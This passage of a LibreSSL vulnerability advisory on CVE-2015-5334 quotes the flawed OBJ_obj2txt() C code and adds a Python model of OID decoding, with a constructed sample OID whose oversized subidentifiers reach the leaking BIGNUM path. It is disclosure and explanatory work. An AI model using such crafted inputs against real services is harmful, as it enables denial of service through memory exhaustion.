This memory leak allows remote attackers to cause a denial of service (memory exhaustion) or trigger the buffer overflow described below.

Buffer Overflow (CVE-2015-5334)

As a result of CVE-2014-3508, OBJ_obj2txt() was modified to "Ensure that, at every state, |buf| is NUL-terminated." However, in LibreSSL, the error-handling code at the end of the function may write this null-terminator out-of-bounds:

489 int
490 OBJ_obj2txt(char *buf, int buf_len, const ASN1_OBJECT *a, int no_name)
491 {
...
516     len = a->length;
517     p = a->data;
518
519     while (len > 0) {
...
522         for (;;) {
523             unsigned char c = *p++;
524             len--;
525             if ((len == 0) && (c & 0x80))
526                 goto err;
...
528             if (!BN_add_word(bl, c & 0x7f))
529                 goto err;
...
535             if (!bl && !(bl = BN_new()))
536                 goto err;
537             if (!BN_set_word(bl, l))
538                 goto err;
...
542             if (!BN_lshift(bl, bl, 7))
543                 goto err;
...
546         }
...
553         if (!BN_sub_word(bl, 80))
554             goto err;
...
561         if (buf_len > 1) {
562             *buf++ = i + '0';
563             *buf = '\0';
564             buf_len--;
565         }
...
569         if (use_bn) {
570             bndec = BN_bn2dec(bl);
571             if (!bndec)
572                 goto err;
573             i = snprintf(buf, buf_len, ".%s", bndec);
574             if (i == -1)
575                 goto err;
576             if (i >= buf_len) {
577                 buf += buf_len;
578                 buf_len = 0;
579             } else {
580                 buf += i;
581                 buf_len -= i;
582
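An added Python model (not Qualys's or LibreSSL's code) of the decoding that OBJ_obj2txt() performs on the content octets of a DER OBJECT IDENTIFIER: the base-128 subidentifier format, the truncated-subidentifier error the quoted loop checks for, which subidentifiers push the C code onto its BIGNUM/BN_bn2dec() path (one allocation each, which is what makes the leak scale with the certificate), and the length contract of the output. It cannot reproduce the C memory defects themselves; the 64-bit unsigned long width and the sample OIDs are assumptions.

```python
"""Python model of the decoding OBJ_obj2txt() performs on the content octets
of a DER OBJECT IDENTIFIER.  Constructed example; it does not and cannot
reproduce the C memory leak or the off-by-one, but shows the input the
function parses and where its BIGNUM path is taken."""

ULONG_BITS = 64  # assumption: unsigned long is 64 bits on the build in question


def oid_subidentifiers(data: bytes) -> list:
    """Base-128 decode, following the loop structure quoted from OBJ_obj2txt():
    a byte with the top bit set continues the current subidentifier, and the
    first decoded value packs the first two arcs of the OID."""
    if not data:
        raise ValueError("empty OBJECT IDENTIFIER")
    subids, i, n = [], 0, len(data)
    while i < n:
        value = 0
        while True:
            c = data[i]
            i += 1
            if i == n and c & 0x80:     # C: if ((len == 0) && (c & 0x80)) goto err;
                raise ValueError("subidentifier runs past the end of the OID")
            value = (value << 7) | (c & 0x7F)
            if not c & 0x80:
                break
        if not subids:                  # C: the BN_sub_word(bl, 80) branch
            subids += [2, value - 80] if value >= 80 else [value // 40, value % 40]
        else:
            subids.append(value)
    return subids


def bignum_subidentifiers(data: bytes) -> list:
    """Subidentifiers too large for an unsigned long (the C code switches to a
    BIGNUM as soon as the running value would overflow one).  For each of these
    the C code calls BN_bn2dec(), i.e. one malloc() per value; in the unpatched
    loop only the last such string is ever free()d."""
    return [s for s in oid_subidentifiers(data) if s >= 1 << ULONG_BITS]


def oid_to_text(data: bytes, buf_len: int) -> tuple:
    """Model the output contract: (text that fits in a buf_len-byte buffer with
    its NUL terminator, length of the complete text).  A caller that ignores
    the second value silently works with a truncated OID string."""
    full = ".".join(str(s) for s in oid_subidentifiers(data))
    if buf_len <= 0:
        return "", len(full)
    return full[:buf_len - 1], len(full)


def is_well_formed(data: bytes) -> bool:
    try:
        oid_subidentifiers(data)
        return True
    except ValueError:
        return False


def encode_oid(arcs: list) -> bytes:
    """DER-encode a list of arcs (test helper; inverse of the decoder)."""
    values = [arcs[0] * 40 + arcs[1]] + list(arcs[2:])
    out = bytearray()
    for v in values:
        chunk = [v & 0x7F]
        v >>= 7
        while v:
            chunk.append(0x80 | (v & 0x7F))
            v >>= 7
        out += bytes(reversed(chunk))
    return bytes(out)


# Constructed inputs: the rsadsi arc 1.2.840.113549 and an OID carrying two
# subidentifiers far beyond 64 bits.
RSADSI = bytes.fromhex("2a864886f70d")
HUGE = encode_oid([2, 5, 1 << 70, 1 << 70, 7])

if __name__ == "__main__":
    print(oid_to_text(RSADSI, 64))
    print("BIGNUM conversions for HUGE:", len(bignum_subidentifiers(HUGE)))
    print("truncated OID accepted:", is_well_formed(bytes.fromhex("2a86")))
```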